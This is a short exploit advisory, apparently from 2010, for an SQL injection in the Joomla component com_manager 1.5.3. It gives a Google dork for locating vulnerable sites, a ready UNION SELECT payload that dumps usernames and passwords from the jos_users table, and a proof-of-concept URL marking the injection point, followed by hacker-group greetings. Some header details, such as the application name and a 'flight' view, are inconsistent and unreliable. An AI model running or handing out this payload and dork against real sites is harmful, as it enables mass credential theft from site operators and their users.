44 lines
No EOL
1.6 KiB
Text
44 lines
No EOL
1.6 KiB
Text
-----------------------------------------------------------------------
|
|
Joomla Component com_manager 1.5.3 (id) SQL Injection Vulnerability
|
|
-----------------------------------------------------------------------
|
|
Author : Islam DefenDers Mr.HaMaDa
|
|
Site : http://MiXaTy.com
|
|
Date : April, 15-2010
|
|
Location : Egyption HackEr
|
|
----------------------------------------------------------------
|
|
|
|
Affected software description:
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
|
|
Application : Egyption HackEr
|
|
Vendor : http://MixaTy.com
|
|
Version : 1.5.3 Other versions may also be affected
|
|
Google Dork : inurl:com_manager
|
|
|
|
Intellectual Property allows independent real estate agents, brokers, or property
|
|
management companies to upload and maintain property listings for sale, for rent and for lease.
|
|
Upload photos, add categories, sub-categories, agent profiles, company profiles.
|
|
Search with an advanced Google Map-Ajax-based map interface. Allow users to save and
|
|
manage favorite properties. Quickly customize colors, filters, galleries and more!
|
|
----------------------------------------------------------------
|
|
|
|
Exploitz:
|
|
~~~~~~~
|
|
|
|
-999999/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--
|
|
|
|
|
|
SQLi p0c:
|
|
~~~~~~~
|
|
|
|
http://127.0.0.1/[path]/index.php?option=com_manager&view=flight&Itemid=[SQL]
|
|
----------------------------------------------------------------
|
|
HaMaDa SCoOoRPioN - ViRuSMaN - DR.BaHy - Mixaty TeaM - Islam DefenDers TeaM
|
|
|
|
----------------------------------------------------------------
|
|
Contact:
|
|
~~~~
|
|
|
|
Site: www.mixaty.com
|
|
|
|
email: hackereg@hotmail.com |